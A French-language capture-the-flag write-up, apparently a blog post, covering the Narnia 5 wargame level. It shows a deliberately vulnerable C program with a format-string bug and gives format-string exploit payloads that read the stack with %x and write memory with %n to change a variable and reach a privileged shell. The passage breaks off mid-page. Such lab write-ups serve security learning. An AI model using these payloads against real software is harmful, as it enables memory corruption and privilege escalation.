{"id":595,"date":"2023-06-01T14:12:13","date_gmt":"2023-06-01T12:12:13","guid":{"rendered":"https:\/\/mindshield.eu\/?p=595"},"modified":"2023-09-06T11:39:47","modified_gmt":"2023-09-06T09:39:47","slug":"narnia5","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/06\/01\/narnia5\/","title":{"rendered":"\ud83e\udd81Narnia 5"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"595\" class=\"elementor elementor-595\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cd7d664 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cd7d664\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fd4f6ba\" data-id=\"fd4f6ba\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3527839 elementor-widget elementor-widget-text-editor\" data-id=\"3527839\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Nous sommes de retour avec le 6\u00e8me challenge de cette s\u00e9rie !<\/p><p>Celui-ci va nous permettre de d\u00e9couvrir de nouvelles vuln\u00e9rabilit\u00e9s, encore jamais vu dans les challenges Narnia : les formats strings !<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d0cd700 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d0cd700\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7b4f20a\" data-id=\"7b4f20a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e0b4d4e elementor-widget elementor-widget-heading\" data-id=\"e0b4d4e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">D\u00e9couverte<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6994f05 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6994f05\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a9346a1\" data-id=\"a9346a1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7f72abe elementor-widget elementor-widget-code-highlight\" data-id=\"7f72abe\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>#include \r\n#include \r\n#include  \r\n\r\nint main(int argc, char **argv){\r\n        int i = 1;\r\n        char buffer[64];\r\n\r\n        snprintf(buffer, sizeof buffer, argv[1]);\r\n        buffer[sizeof (buffer) - 1] = 0;\r\n        printf(\"Change i's value from 1 -&gt; 500. \");\r\n\r\n        if(i==500){\r\n                printf(\"GOOD\\n\");\r\n        setreuid(geteuid(),geteuid());\r\n                system(\"\/bin\/sh\");\r\n        }\r\n\r\n        printf(\"No way...let me give you a hint!\\n\");\r\n        printf(\"buffer : [%s] (%d)\\n\", buffer, strlen(buffer));\r\n        printf (\"i = %d (%p)\\n\", i, &amp;i);\r\n        return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-a00378d elementor-widget elementor-widget-text-editor\" data-id=\"a00378d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le but de ce challenge est d\u2019obtenir un <code>i = 500<\/code>.<\/p><p>Gr\u00e2ce \u00e0 la sortie, on connait l\u2019adresse m\u00e9moire de i et la valeur du buffer (ainsi que sa longueur).<\/p><p>Ici la vuln\u00e9rabilit\u00e9 va se situer au niveau du <code>snprintf<\/code>.<\/p><p>En effet il s\u2019agit d\u2019une fonction peu s\u00e9curis\u00e9e car elle ne v\u00e9rifie pas la taille du buffer de destination.\u00a0<\/p><p>De plus, elle permet \u00e0 un attaquant d&#8217;acc\u00e9der ou de modifier des valeurs sur la pile gr\u00e2ce \u00e0 une attaque par injection de format.<\/p><p>Celle-ci s\u2019exploite en envoyant des chaines de format tel que &#8220;%x&#8221;.<\/p><p>Pour rappel, les fonctions de la famille format on retrouve :\u00a0<\/p><p>&#8211; snprintf<\/p><p>&#8211;\u00a0<span style=\"font-family: Roboto, sans-serif;font-size: 18px;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">sprintf<\/span><\/p><p>&#8211; printf<\/p><p>&#8211; fprintf<\/p><p>&#8211; vfprintf<\/p><p>&#8211; etc.<\/p><p>Ces fonctions prennent des param\u00e8tres qui sp\u00e9cifient un format (les <i>format specifiers ou chaine de format)<\/i>. Voici quelques exemples :\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-db308f8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"db308f8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-469703c\" data-id=\"469703c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2ff9e4b elementor-widget elementor-widget-image\" data-id=\"2ff9e4b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"241\" height=\"241\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio.png\" class=\"attachment-large size-large wp-image-605\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio.png 241w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio-150x150.png 150w\" sizes=\"(max-width: 241px) 100vw, 241px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d1643ab elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d1643ab\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-597db3c\" data-id=\"597db3c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4f7b16b elementor-widget elementor-widget-heading\" data-id=\"4f7b16b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Exploitation<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-02df3c6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"02df3c6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1f1d517\" data-id=\"1f1d517\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-33ab65e elementor-widget elementor-widget-text-editor\" data-id=\"33ab65e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>La fonction snprintf fonctionne de la mani\u00e8re suivante :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-97993bd elementor-widget elementor-widget-code-highlight\" data-id=\"97993bd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>snprintf(destination, taille \u00e0 lire, source, options)\n# Exemple\nsnprintf(buffer, 256, \"Coucou%x\", val)<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bf8c9e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bf8c9e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0a2cf7b\" data-id=\"0a2cf7b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-93e4e3e elementor-widget elementor-widget-text-editor\" data-id=\"93e4e3e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Dans cet exemple, la chaine &#8220;Coucou&#8221; va \u00eatre copi\u00e9 dans le buffer.<\/p><p>De plus, la valeur de val sera affich\u00e9 en hexad\u00e9cimal.<\/p><p>Or, si nous ne pr\u00e9cisons pas de variable \u00e0 lire, snprintf va tout de m\u00eame lire une valeur, celle de la pile.<\/p><p><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Nous pouvons tester la vuln\u00e9rabilit\u00e9 en essayant de visualiser la pile :<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-256766b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"256766b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2b6e053\" data-id=\"2b6e053\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0688368 elementor-widget elementor-widget-code-highlight\" data-id=\"0688368\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>\/narnia\/narnia5 $(python2 -c 'print(\"%08x.%08x.%08x.%08x\\n\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c564bc8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c564bc8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d27179e\" data-id=\"d27179e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cdd3ed3 elementor-widget elementor-widget-text-editor\" data-id=\"cdd3ed3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>R\u00e9sultat de la commande :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-956ef40 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"956ef40\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e66d0d7\" data-id=\"e66d0d7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4908b54 elementor-widget elementor-widget-code-highlight\" data-id=\"4908b54\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>Change i's value from 1 -&gt; 500. No way...let me give you a hint!\r\nbuffer : [f7fc4500.30303534.3330332e.33353330] (35)\r\ni = 1 (0xffffd520)\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-615a609 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"615a609\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f728b3a\" data-id=\"f728b3a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9414bf6 elementor-widget elementor-widget-text-editor\" data-id=\"9414bf6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>A l&#8217;int\u00e9rieur de la variable buffer, on peut voir les 4 derni\u00e8res valeurs pr\u00e9sentes sur la pile !<\/p>\n<blockquote>\n<p><b>Ce qui se passe ici :<\/b> printf va interpr\u00e9ter tous les <em>format specifiers<\/em>&nbsp;(%x) et lire l\u2019adresse pr\u00e9c\u00e9dente de la pile.<\/p>\n<\/blockquote>\n<p>Nous pouvons ainsi d\u00e9duire que l&#8217;on peut manipuler les <em>format specifiers<\/em> afin de modifier la valeur de i.<\/p>\n<p>Pour cela, nous allons avoir besoin du <i>format specifier %<\/i>n. J&#8217;ai mis du temps \u00e0 comprendre son fonctionnement et son utilit\u00e9.<\/p>\n<p>Pour des explications compl\u00e8tes, je vous conseille ce guide :&nbsp;<a style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\" href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\">formatstring-1.2.pdf (stanford.edu)<\/a>.<\/p>\n<p>Dans les grandes lignes, %n permet de compter le nombre d&#8217;octets \u00e9crits jusqu&#8217;\u00e0 pr\u00e9sent et de l&#8217;\u00e9crire dans une variable en param\u00e8tre.&nbsp;<\/p>\n<p>Il peut donc \u00eatre utilis\u00e9 pour \u00e9crire directement sur la pile.<\/p>\n<p>En effet, lorsqu&#8217;on utilise %n comme ci-dessous, il permet d&#8217;\u00e9crire le nombre de caract\u00e8re \u00e9crit dans la variable val :<\/p>\n<p><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-0aec523 elementor-widget elementor-widget-code-highlight\" data-id=\"0aec523\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>snprintf(buffer, 256, \"Coucou%n\", val)<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c5a1559 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c5a1559\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-06c5723\" data-id=\"06c5723\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3cde0cf elementor-widget elementor-widget-text-editor\" data-id=\"3cde0cf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Or dans notre exemple, il n&#8217;y a pas de param\u00e8tre val :\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3414f31 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3414f31\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-58c9fa9\" data-id=\"58c9fa9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-06c4501 elementor-widget elementor-widget-code-highlight\" data-id=\"06c4501\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>snprintf(buffer, sizeof buffer, argv[1]);<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3c09909 elementor-widget elementor-widget-text-editor\" data-id=\"3c09909\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">Si notre chaine de caract\u00e8re contient donc des &#8220;%n&#8221;, il \u00e9crira dans la pile comme s&#8217;il y avait un param\u00e8tre.\u00a0<\/span><\/p><p>Il y a notamment 2 m\u00e9thodes \u00e0 combiner afin de r\u00e9soudre le challenge : la m\u00e9thode du\u00a0<b>Direct Access Parameters<\/b> et les exploitations de format strings classiques.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e4a5882 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e4a5882\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a63c9ff\" data-id=\"a63c9ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b8b8ae4 elementor-widget elementor-widget-heading\" data-id=\"b8b8ae4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-large\">Exploitation de format strings classiques<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-013c74f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"013c74f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f6d9169\" data-id=\"f6d9169\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-990d778 elementor-widget elementor-widget-text-editor\" data-id=\"990d778\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Pour comprendre l&#8217;exploitation de format strings classique, ce guide m&#8217;a beaucoup aid\u00e9 :\u00a0<a style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\" href=\"https:\/\/www.exploit-db.com\/docs\/english\/28476-linux-format-string-exploitation.pdf\">Format Strings Exploitation Tutorial (exploit-db.com)<\/a><\/p><p>Il reprend des exemples d&#8217;exploitations basiques dont on peut s&#8217;inspirer pour notre exploit.<\/p><p>Par exemple :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1ef6abe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1ef6abe\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-99aadaf\" data-id=\"99aadaf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c2b5537 elementor-widget elementor-widget-code-highlight\" data-id=\"c2b5537\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp> $(printf \"\\x84\\x95\\x04\\x08AAAA\")%x%x%x%x%x%x%x%x%x%n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-737b5ed elementor-widget elementor-widget-text-editor\" data-id=\"737b5ed\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Cette injection permet d&#8217;\u00e9crire \u00e0 l&#8217;adresse <code>0x08049584<\/code>.<\/p><p>Le dernier<b> %x<\/b> a \u00e9t\u00e9 remplac\u00e9 par un <b>%n<\/b>, ce qui permet d&#8217;\u00e9crire le nombre d&#8217;octets jusqu&#8217;\u00e0 pr\u00e9sent, dans l&#8217;adresse donn\u00e9e.<\/p><p>Dans notre cas, nous n&#8217;avons pas besoin d&#8217;\u00e9crire &#8220;<b>AAAA<\/b>&#8221; pour notre injection finale. Ces A ne sont l\u00e0 qu&#8217;\u00e0 des fins de test, pour les retrouver sur la pile.<\/p><p>On peut transposer cette injection en python, ce qui nous donne :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7d6cb70 elementor-widget elementor-widget-code-highlight\" data-id=\"7d6cb70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"\\x84\\x95\\x05\\x08\")')%x%x%x%x%x%x%x%x%x%n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f008910 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f008910\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6f3ab9a\" data-id=\"6f3ab9a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div 